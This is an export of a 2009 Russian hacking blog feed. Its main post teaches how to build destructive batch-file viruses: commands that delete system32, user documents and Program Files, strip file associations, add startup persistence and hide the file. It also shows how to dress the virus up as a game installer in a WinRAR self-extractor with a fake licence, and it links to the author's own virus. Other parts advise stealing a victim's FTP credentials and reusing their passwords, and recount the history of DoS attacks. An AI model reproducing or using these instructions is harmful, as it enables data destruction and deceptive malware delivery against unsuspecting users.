/&gt;&lt;br /&gt;Поищите в директории C:WINDOW файл wcx_ftp.ini,так как если жертва использует Total Commander для доступа по FTP к сайтам,то так же как и с кукисами,если вы замените этот файл на свой,то получите досткуп к его сайтам.&lt;br /&gt;&lt;br /&gt;Также поищите текстовые файлы на рабочем столе или на других дисках жертвы с пассами,так как чаще всего они просто хранят их чтоб не забыть на видном месте.&lt;br /&gt;&lt;br /&gt;Пробуйте тоже использовать один и тот же пасс на всех акаунтакх жертвы,часто люди используют одни и те же пароли для всего.У меня так очень часто совпадало))))&lt;br /&gt;&lt;br /&gt;Ну вот и всё,всё САМОЕ ПРОСТОЕ что должен знать НОВИЧЁК попадая на чужие компы.Как я уже и говорил выше,я описал только всё самое-самое простое,чтоб не сильно загружать новичков в этом деле.Больше и в расширенном профиле об этом в следующих статьях.&lt;br /&gt;&lt;br /&gt;Всё что здесь описанно,это только для ознакомительных целей,за некорректное использование этого материала и не отвечаю.&lt;br /&gt;&lt;br /&gt;Спасибо за внимания,всем удачи!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-6327287809556416973?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/6327287809556416973/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=6327287809556416973' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/6327287809556416973'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/6327287809556416973'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/05/blog-post.html' title='Пароли и безопасность для всех .'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-5987546440195071710</id><published>2009-04-25T05:03:00.000-07:00</published><updated>2009-04-25T05:04:20.960-07:00</updated><title type='text'>Чем опасные бат вирусы</title><content type='html'>В этой статье я не буду рассказывать как создовать вирусы с нуля вы уже это&lt;br /&gt;узнали с моей предведущей статьйи (большая статья по нописанию бат вирусоов).&lt;br /&gt;В этой статье я научу вас&lt;br /&gt;1.Ознокомлю с самыми злыми командами&lt;br /&gt;2.Научу бат переделывать в exe&lt;br /&gt;3.Предложу свою версию вируса&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;Shutdown -t 0 –s -Эта команда выключает компютер&lt;br /&gt;del *.* /q&lt;br /&gt;&lt;br /&gt;После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в кататалогах и подкаталогах.&lt;br /&gt;Параметр /q задаёт удаление без подтверждения.&lt;br /&gt;Теперь мы удалим шрифты:&lt;br /&gt;&lt;br /&gt;del C:windowsfonts /q&lt;br /&gt;&lt;br /&gt;Почему без /s ? А зачем, там нет подпапок.&lt;br /&gt;Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:&lt;br /&gt;&lt;br /&gt;del C:windowsMedia /q&lt;br /&gt;&lt;br /&gt;Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.&lt;br /&gt;&lt;br /&gt;del C:windowssystem32 /q /s&lt;br /&gt;&lt;br /&gt;Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты "Скрытый" и "Системный" то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечайного стирания). Что в этом случае делать? Придёться сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога.&lt;br /&gt;del C:windows*.bmp /q /s&lt;br /&gt;&lt;br /&gt;И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы.&lt;br /&gt;Премудрости удаления&lt;br /&gt;Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить…&lt;br /&gt;Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:&lt;br /&gt;&lt;br /&gt;attrib -a -s -h -r C:*.*&lt;br /&gt;del C:*.* /q&lt;br /&gt;&lt;br /&gt;Но тут нам много удалить не дадут. Всё тристо раз защищено.&lt;br /&gt;&lt;br /&gt;Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:&lt;br /&gt;&lt;br /&gt;rd %ProgramFiles% /s /q&lt;br /&gt;&lt;br /&gt;А вот если написать:&lt;br /&gt;&lt;br /&gt;rd C:Program Files /s /q&lt;br /&gt;&lt;br /&gt;то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку "Program" и папку "Files". Ладно у нас есть зарезервированая команда для папки Program Files - %programfiles%. А если мы хотим удалить "Мои документы". То вирус будет искать папки "Мои" и "Документы". В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:&lt;br /&gt;&lt;br /&gt;Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.&lt;br /&gt;del "%USERPROFILE%Мои документы*.*" /q /s&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd "C:Documents and SettingsА тут чё писать????Рабочий стол" Видите где я вас спрашиваю "Тут чё писать" действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%&lt;br /&gt;И не забывайте если есть в какой либо команде русские буквы например "Рабочий стол" или "Мои документы" обязательно в начале пишите команду Chcp 1251&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;А если мы хотим удалить в папке "Windows" только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это... Но можно всё это написать в одной команде:&lt;br /&gt;&lt;br /&gt;for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q&lt;br /&gt;&lt;br /&gt;Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).&lt;br /&gt;&lt;br /&gt;Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. "Жертва" его удаляет, а он при загрузке появляется снова. А если "жертва" мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать "жертве" вопросы о перезаписи... "жертва" сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.&lt;br /&gt;&lt;br /&gt;if not VIR*?????????.sys goto x&lt;br /&gt;exit&lt;br /&gt;:x&lt;br /&gt;МУСОР.&lt;br /&gt;&lt;br /&gt;Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку "VIR". Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка "VIR" в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова.&lt;br /&gt;Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться... Где написано слово "МУСОР" должны быть написаны команды создования мусора.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на "O" ; "P" ; "Q" ; "R" ; "S" ; "T" ; "U" или ещё какие (правильно делают). Безопасность, будь она не ладна.&lt;br /&gt;&lt;br /&gt;rd C: /s /q -а это гдавноя команда удоления вить она может отформотировать диск за 10-20 сек в зовисимости от обёма диска&lt;br /&gt;&lt;br /&gt;chcp 1251&lt;br /&gt;cd "%USERPROFILE%Главное менюПрограммы"&lt;br /&gt;md 1 …и.т.д.&lt;br /&gt;&lt;br /&gt;и папки будут создаваться в разделе программы.&lt;br /&gt;&lt;br /&gt;Или допишите вот так…&lt;br /&gt;&lt;br /&gt;chcp 1251&lt;br /&gt;cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"&lt;br /&gt;md 1 ….и.т.д.&lt;br /&gt;&lt;br /&gt;допустим мы создадим 100 пустых папок в папке "Автозагрузка" и при включение компа каждый раз будут открываться сотня папок, даааа так сдохнуть можно каждый раз их закрывая…&lt;br /&gt;&lt;br /&gt;Удалим расширение&lt;br /&gt;Кстати говоря, очень вредный вирус получиться, если поменять расширение. Вот например кажется ярлык подумаешь… он мне и не нужен вовсе… ан нет без ярлыков будет просто ужасно вы только представьте чтобы сыграть в игру вам достаточно щелкнуть по ярлыку находящемуся на вашем рабочем столе, а когда ярлыка нет… вам надо лезть в диск С: заходить в папку «Игры» потом что-то ещё… да так сдохнуть можно! Итак, я тут подумал, одним из важных вещей у нас является ярлык, так мы берём и…&lt;br /&gt;&lt;br /&gt;assoc .lnk=.avi&lt;br /&gt;&lt;br /&gt;здесь наглядно показано, что я хочу поменять ярлык (расширение, как известно .lnk) на музыкальное расширение .avi и уже понятно, что ярлык с таким расширением ни куда вас не пошлёт! А вот вы комп будете долго посылать.… Ну и, конечно же, нетрудно догадаться, как такой вирусик может оказаться разрушительным, мы с вами поменяем приложение .exe и тогда ни одна программа, ни запуститься!!!&lt;br /&gt;&lt;br /&gt;assoc .exe=.avi&lt;br /&gt;&lt;br /&gt;тут показано расширение программ .exe ну и уже по традиции я меняю его на .avi вы кстати можете придумать что-нибудь своё… например поменять jpg (рисунки) например на .virus вот весело будет когда он захочет посмотреть свои картинки…&lt;br /&gt;можно же просто удалить расширение, не заменяя его на другое:&lt;br /&gt;&lt;br /&gt;assoc .exe=&lt;br /&gt;&lt;br /&gt;после знака = надо нажать один раз пробел, а уже потом сохранять наш вирусик.&lt;br /&gt;Кстати говоря, если хотите доставить своей жертве хорошую встряску, напишите в одном вирусике команд 20 удалений расширений все (разные и необходимые)&lt;br /&gt;В таблице я привёл некторые расширения, если вам кажеться что их не достаточно пишите свои.&lt;br /&gt;&lt;br /&gt;Приложение .exe .com&lt;br /&gt;Текстовые файлы doc .txt .wp .diz .log .wri&lt;br /&gt;Музыкальные файлы .mp3 .wav .avi .wmv .mpg&lt;br /&gt;Картинки .bmp .jpg .gif .tif .pic&lt;br /&gt;Ярлыки .lnk .url&lt;br /&gt;Архиваторы .rar .zip .arj .cab lzh.&lt;br /&gt;Шрифты fon .ttf .atm&lt;br /&gt;Файл реестра .reg .key&lt;br /&gt;Системные файлы .sys .dll .rnf .drv .ega&lt;br /&gt;Файл справки .chm .hlp&lt;br /&gt;&lt;br /&gt;Можно путь для копирования поставить другой путь:&lt;br /&gt;&lt;br /&gt;copy C:*.* C: program наш никчёмный файл появиться на диске С:&lt;br /&gt;&lt;br /&gt;можно скопировать, что-нибудь другое:&lt;br /&gt;&lt;br /&gt;copy C:windowssystem32*.* C:Microsoft*.exe&lt;br /&gt;&lt;br /&gt;Видно что все файлы будь это текст, или музыка мы сохраняем как пиложение *.exe. Но это уже очень длительный процесс (копировать всё из system32) придется приукрасить программу. Cмотри главу: "Создаём эффект программы" Есть другой способ копирования:&lt;br /&gt;&lt;br /&gt;dir c: /s/a &gt; C:/1.txt&lt;br /&gt;&lt;br /&gt;Эта команда просто скопирует все пути к папкам и файлам в один текстовый файл (долго). А можно в одной команде задать несколько каталогов и все файлы из них слепяться в один кусок, например:&lt;br /&gt;&lt;br /&gt;copy C:WINDOWS*.txt + C:WINDOWSHelp*.* KYSOK&lt;br /&gt;&lt;br /&gt;Мы видим что я беру из папки "Windows" все текстовые файлы а из папки "Help" вообще все файлы и слепливаю кусок из всех них в файл "KUSOK" (од даже будет без расширения, но можно его и сделать, если пожелаете)&lt;br /&gt;&lt;br /&gt;А можно полностью скопировать папку "system32" в другое место и поставить атрибут скрытый, чтобы жертва не удалила нашу совершенно ненужную копию.&lt;br /&gt;&lt;br /&gt;xcopy C:WINDOWSWeb C:mysor /q /e /h /y копируем папку web в папку musor.&lt;br /&gt;attrib +h +s C:/mysor всё скрываем с глаз людских.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;Если посмотреть то я задал много параметров для команды xcopy (у неё их ещё больше). Итак параметр /q ну это как везде, чтобы на экране не было лишних сообщений. /e для копирования пустых каталогов. По умолчнию Системные и Скрытые файлы не копируються так вот параметр /h разрешает их копирование. Если при копировании имена совпадут то будет задан вопрос о перезаписи, зачем нам вопросы вот мы влепили параметр /y.&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ах, совсем забыл, не пишите вот такую команду:&lt;br /&gt;&lt;br /&gt;copy C:*.* C:Windows&lt;br /&gt;&lt;br /&gt;А то антивирус, если он есть у нашей жертвы, обязательно обезвредит этот наш вирус, посчитав его за Троян.BAT.CopyToWindows.&lt;br /&gt;&lt;br /&gt;Можно оповещать нашу жертву о ходе действия нашего вируса.&lt;br /&gt;для этого есть команда msg * Подождите программа выполнит соответствующие операции или както так короче можно написать чо чочеш&lt;br /&gt;&lt;br /&gt;Можно использовать и другой способ, открывая на весь экран блокноты, в которых будет написано сообщение:&lt;br /&gt;&lt;br /&gt;echo &gt;&gt; read.txt Пожалуйста, внимательно прочитайте! Перед тем как установить игру закройте….и.т.д.&lt;br /&gt;start/max read.txt&lt;br /&gt;&lt;br /&gt;Тут так же действует вывод сообщения но мы задали его отправить в текстовый файл read. Вторая строка говорит, что мы хотим открыть наш текстовый файл уже с готовым сообщением во весь экран. И пока наша жертва будет читать, что там ей надо сделать, вирус сделает своё дело. Можно конечно вместо скучной лекции написать прикольные анекдоты и тогда жертва уже точно отвлекаться.&lt;br /&gt;&lt;br /&gt;Можно остоновить выполнение нашего вируса хитрой командой. Вылетит собщение "Для продолжения нажмите любую клавишу...".&lt;br /&gt;&lt;br /&gt;pause&lt;br /&gt;&lt;br /&gt;Красивая оболочка&lt;br /&gt;Ну, вот мы отослали наш с вами готовый вирусик вашему «другу», а он его не открыл т.к. у него появились сомнения на счёт такого странного файла и весит он мало и значок не внушает доверия и расширение какое-то странное… Мы немного постараемся исправить положение улучшив вид нашей ложной программы, это как бы вторая часть главы «Создаём эффект программы». Кстати говоря, я вот такое улучшение употреблял ко всем своим тупым вирусам и вам советую. Правда улучшать нам поможет WinRAR-это самый знаменитый архиватор.&lt;br /&gt;Первым делом открываем WinRAR (его можно скачать тут&lt;br /&gt;http://www.rarlab.com&lt;br /&gt;http://www.rarsoft.com)&lt;br /&gt;Рассматривать архиватор мы будем на примере создания вируса, который вырубает комп после включения, помните? Да ещё сделаем так, чтобы при следующем включение он опять таки отключался!&lt;br /&gt;&lt;br /&gt;Берём уже заранее заготовленный файл отключения через x секунд, оттаскиваем в открытое окно архиватор и бросаем его туда. Тут же вылетает окно «Имя и параметры архива» тут можно указать «Степень сжатия» указать «Имя архива» а мы просто ставим галочку на квадратик «Создать SFX-архив» можно тут же заметить, что расширение меняется на .exe это значит, что мы делаем настоящее приложение! Заходим на страницу «Дополнительно» и нажимаем кнопку «Параметры SFX» вылетает окошко «Дополнительные параметры SFX» Под полем «Путь для распаковки» можно поставить, чтобы ваш файл распаковался в папку «Program Files» или создать его в «Текущей папке» то есть там, где будет запущен наш вирус, в самом поле «Путь для распаковки можно даже не чего и не писать. А вот в поле «Выполнить после распаковки» надо написать имя нашего файла с расширением, например: virus.bat (вот собаки ещё расширение им указывай! Кстати это мы сделали, для того чтобы непосредственно, после того как мы откроем (архив) вирус он автоматически запуститься, и отключал систему, или там сотрет, что-нибудь «ненужное»). В поле «Выполнить до распаковки» не чё писать не надо. На вкладке «Дополнительно» нажимаем кнопку «Добавить ярлык…» вылетает новое окно, где написано «Место создания ярлыка» ставим пометку «В папке Автозагрузка» (можно и в «Меню Пуск» и «На рабочем столе» но нам надо, чтобы при включении комп вырубался снова ведь так»).&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;И поэтому когда при следующей загрузке компа система начнёт загружать элементы «Автозагрузки» то само собой загрузит, и наш файл и делать нечего отключит комп снова! Правда обводка тут слишком проста, когда идёт сама загрузка, просто держите нажатой клаву «Shift» и ком автоматически обойдёт элементы «Автозагрузки» и соответственно не отключиться, но не все это знают!&lt;br /&gt;&lt;br /&gt;--------------------------------------------------------------------------------&lt;br /&gt;В поле «Имя файла, для которого будет создан ярлык» пишем имя нашего файла, например virus.bat ну и ещё и в поле «Имя ярлыка (файла .lnk):» пишем, что вашей душе угодно (можно конечно написать что-нибудь такое типа: «Microsoft» или «Intel» и тогда это будет выглядеть более убедительно чем «Отключение») и всё, больше не чего не пишите разве можно написать в поле «Описание ярлыка», что-нибудь такое: «Not to delete» или «System file» ну чтобы придать немного сомнения. Подтверждаем ОК.&lt;br /&gt;На странице «Режимы» где написано «Режим ввода информации» можно поставить пометку «Скрыть всё» и тогда при распаковки ни кто не чего у вас не спросит, а просто распакует и всё. Я советую поставить пометку «Не показывать начальный диалог» и тогда наша программа ни будет нас спрашивать, куда установить наш файл, а просто покажет лицензию, которую мы с вами щас и напишем. Ах да где написано «Режим перезаписи» ставим пометку «Перезаписывать без подтверждения».&lt;br /&gt;На странице «Лицензия» в поле «Заголовок окна с лицензией» пишем название, например «Игра» если вы косите под игру, или «garbage collector» чтобы совсем запутать. В поле «Текст лицензии» вешаем лапшу на уши и даём волю своей фантазии ну, например:&lt;br /&gt;Сейчас работает мастер установки игры «pirate». Это длительный процсс и отмена операции может повредить. Пожалуйста внимательно прочитайте, что будет написано ниже для полноправного использования данной продукцией:…тру ля ля.…ля ля… Ну там лечите дальше сколько душе угодно, это для того чтобы не оставить не малейшего сомнения на счёт происхождения и назначения программы, и вот ещё пожалуйста пишите без ошибок, а то вас тут же раскусят!&lt;br /&gt;На странице «Текст и значок» не чего не следует писать, так этого программа не покажет из-за того, что мы поставили отметку «Не показывать начальный диалог» если её не поставить, то и тут можно накуролесить всякой ахинеи. Правда следует воспользоваться ещё одним маневром, где написано «Значок SFX-архива» можно я бы сказал нужно выбрать хоть какой-нибудь значок, а то жертву может отпугнуть значок который подставиться по умолчанию. А если загружить привычный значёк "WORD(а)" или картинки, то жертва без малейших подозрений с радостью запустит... хм... вот. И ещё можно загрузить какую-нибудь картинку «по теме конечно» и тогда она будет отображаться при чтении лицензии (это красивый эффект). Ну, вот, пожалуй, и всё если всё грамотно и правильно сделать, то у жертвы не будет и малейшего сомнения, что у него в руках лицензионная игра, ну а когда он её распакует, обрадуется, так что придётся переустанавливать систему!&lt;br /&gt;&lt;br /&gt;Надо было написать это в главе «Отключение» но тогда мы не знали этих команд. Я предлагаю мало того, что мы поставим наш файл в папку «автозагрузка» так мы его скроем т.к. тот, кто догадается в эту папку посмотреть, без труда наш вирус удалит многократное выключение не удаться:&lt;br /&gt;&lt;br /&gt;Chcp 1251&lt;br /&gt;cd "%USERPROFILE%Главное менюПрограммыАвтозагрузка"&lt;br /&gt;attrib +h&lt;br /&gt;&lt;br /&gt;вы видите, что я сначала переключаюсь на русскую кодовую страницу это потому что в нашей команде есть русские буквы.&lt;br /&gt;Только вот, есть одна здоровая загвоздка, из трёх компов (на которых я проверял эту команду), на двух автозагрузка не сработала просто убрала все элементы и как будто их и не было.&lt;br /&gt;&lt;br /&gt;Но и тут есть запара жертва открывает вир видит выскакивает окно&lt;br /&gt;жертва быстринько его закрывает и всё вир не сработал но я нашёл способ чтоб окно не открывалось нужно вписать скрипт в самораспоковуйщийся архив&lt;br /&gt;и имно его архив и должен открыть а скрипт этот мы будем писать на vbs его можно создать в блокноке а прописывать мы там будем&lt;br /&gt;Set WshShell = WScript.CreateObject("WScript.Shell")&lt;br /&gt;WshShell.Run"C:sistem32Connect.bat ", 0, true&lt;br /&gt;&lt;br /&gt;Как видете тут указан путь к виру я не ззнаю какой путь будет у вас но в моём вире он такой какой я покозал&lt;br /&gt;ну вот в принцепи и всё а мой вир вы можете скачать с http://depositfiles.com/files/k5dt7te0g&lt;br /&gt;если чтото не поняли пишыте в коментарии я отвечу&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-5987546440195071710?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/5987546440195071710/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=5987546440195071710' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5987546440195071710'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5987546440195071710'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/04/blog-post.html' title='Чем опасные бат вирусы'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-5650380600367744855</id><published>2009-03-20T03:00:00.000-07:00</published><updated>2009-03-20T03:20:14.781-07:00</updated><title type='text'>Что такое Nuke</title><content type='html'>Словом Nuke (нюк) называют сегодня любую атаку на порты удаленных компьютеров, приводящую к краху операционной системы или разрыву интернет-соединения. Nuke не нарушает состояние файловой системы и не рушит "железо" компьютера. Перезагрузившись, пользователь может продолжить работу в Сети. Все началось с атаки, исходный код которой на языке С назывался nuke.c. Атака не получила широкого распространения, так как могла работать только на UNIX системах с правами root. Идея nuke.c заключалась в том, что она отсылала неправильные (invalid) ICMP пакеты, и машина-хост теряла связь.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;В январе 1997 появилась атака под названием Ping o' Death, и 18 распространенных операционныхсистем оказались к ней весьма чувствительны. Ping o' Death основана на отсылке более 65 507 байтов данных. Так как большинство систем не собирают все пакеты до того, как получат их полностью, то при определенных ухищрениях можно добиться эффектного результата - полученные данные просто не уместятся в 16-битной внутренней переменной, возникает неустранимая ошибка и рушится операционная система. Но, пожалуй, первой широко известной атакой стала Out Of Band (WinNuke).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7 июня 1997 г. некто по имени "_eci" впервые опубликовал в Сети исходный код реализующей ее программы.&lt;br /&gt;В течение 15 дней, что специалисты из Мicrosoft устраняли эту дыру, в Интернете росла эпидемия синих экранов. Не угасла она и до сих пор, поскольку далеко не каждый пользователь удосужился "залатать дыры" своей операционки. Атака Out Of Band (OOB) основана на том, что 139 порт Win95 (135 порт WinNT) не закрыт для постороннего вторжения, поэтому, отослав на этот порт пакет данных с флагом заголовка OOB, можно спровоцировать зависание операционной системы и появление синего экрана. Не успели утихнуть разговоры по поводу OOB, как появилась новая напасть под названием Ssping (Jolt). При этой атаке в адрес хоста отсылаются поддельные TCP/IP пакеты, что приводит к замедлению работы или разрыву связи. Эта атака не была столь летальной, как OOB, но тоже смогла доставить немало неприятностей.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;В начале июля 1997 года на арену вышла Fragmentation Attack (Teardrop), основанная на отсылке IP пакетов заведомо неправильной длины. Атакованный компьютер не может соединить эти пакеты и зависает.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;В начале декабря 1997 года появилась атака под названием Land. Методы воздействия схожи с методами SSPing за одним маленьким исключением -- программные заплатки, справлявшиеся с SSPing, оказались бессильны.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Январь 1998 года. Bonk и Bonik - модификации TearDrop, основанные на несформированной UDP информации заголовков IP пакетов. Уже к третьей декаде месяца Microsoft выпустила защищающие от этой атаки дополнения, но многие входящие в "группу риска" пользователи так и не удосужились эту "заплатку" установить. Расплатой за небрежность стала ночь со 2 на 3 марта 1998 года, когда неизвестный злоумышленник вывел из строя тысячи Windows-машин в США именно этой атакой. Среди пострадавших оказались NASA и Массачусетский технологический университет.&lt;br /&gt;Часто атаки комбинируются. Например, Land &amp; IP Spoofing: нападающая сторона многократно провоцирует сервер на обмен сообщениями, но в качестве обратного адреса указывает вымышленный. Таким образом, возникают полуоткрытые соединения (half-open connections), при определенном количестве которых сервер просто не в состоянии открывать новые. В большинстве случаев сервер-жертва ощутимо замедляет свою работу, хотя может возникнуть аварийная перезагрузка памяти. (Spoofing - подмена реального адреса отправителя вымышленным. Как правило, используется в сочетании с разными видами атак, чтобы жертва не смогла определить адрес нападавшего.)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-5650380600367744855?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/5650380600367744855/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=5650380600367744855' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5650380600367744855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5650380600367744855'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/03/nuke.html' title='Что такое Nuke'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-4945496762098263276</id><published>2009-03-20T02:58:00.000-07:00</published><updated>2009-03-20T02:59:02.851-07:00</updated><title type='text'>Что такое трояны?</title><content type='html'>Дамы и господа! С опозданием на год я все-таки решил написать для Вас эту статью. Написать просто из уважения к Вам. Не в обиду будет сказано, но большинство так называемых "пользователей" персональных компьютеров на самом деле ОЧЕНЬ мало понимают работу САМИХ компьютеров. Дело даже не в том, что кто-то чего-то не знает... Скажите, зачем например, юристу, менеджеру, доктору наук или врачу ДОСКОНАЛЬНО знать все тонкости работы компьютера? У этих людей, как правило, своя специфика, они гораздо больше знают в другой области наук. Знать принципы работы компьютера, высшую математику, десяток языков программирования, сетевые протоколы, несколько операционных систем, принципы атаки и защиты на компьютеры этим людям совсем необязательно. Но по роду своих занятий, по своей работе такие люди вынуждены использовать вычислительную технику хотя бы потому, что это достаточно удобно. Но что именно удобно, благодаря чему использовать компьютеры стало удобно? Позволю себе высказать свою точку зрения. Если кто-то со мной не согласен, то мы обсудим это по e-mail.&lt;br /&gt;&lt;br /&gt;Итак... Многие ругают операционную систему WINDOWS любой версии и его создателя Билла Гейтса. Действительно, хороша или плоха его операционная система? Как говорится, это еще бабушка надвое сказала. С одной стороны - хороша, с другой - плоха...&lt;br /&gt;&lt;br /&gt;Чем хороша? Прежде всего тем, что она КРАЙНЕ проста в установке, настройке и использовании (На взгляд "простого" пользователя). Практически любой человек, даже не имевший опыта работы за компьютером, может за пару дней научиться сносно использовать его для офиса, для игр и для прочих задач. В этом смысле WINDOWS - это воплощение гениальной идеи. (Я это серьезно!).&lt;br /&gt;&lt;br /&gt;А чем же плоха WINDOWS, что многие ругают ее последними словами? О, тут вам "крутой компьютерщик" много чего наговорит... Сразу стоит сказать, что это далеко не самая стабильная в работе операционная система, это присуще как ее первым версиям, так и последним. Процитирую одного из "серьезных" пользователей: - "Как я могу доверить свою научную работу этой операционке, если она в любой момент отправит все мои труды коту под хвост?" Этот человек действительно в результате сбоя потерял важные данные...&lt;br /&gt;&lt;br /&gt;Но самое важное, что операционная система WINDOWS буквально оптимизирована для взлома...&lt;br /&gt;&lt;br /&gt;Действительно, Microsoft не потрудилась применить криптостойкие алгоритмы защиты (частный случай). Что было сделано, чтоб спрятать те же самые пароли? Всего лишь то, чтоб их нельзя было увидеть, нажав F3 в Нортон Коммандере. Это помогло бы только против самых что ни на есть "псевдо" хакеров. (Даже нечем похвалиться, если бы вас так подломали).&lt;br /&gt;&lt;br /&gt;Но создатели WINDOWS решили не утруждать себя и закодировали все пароли в системе 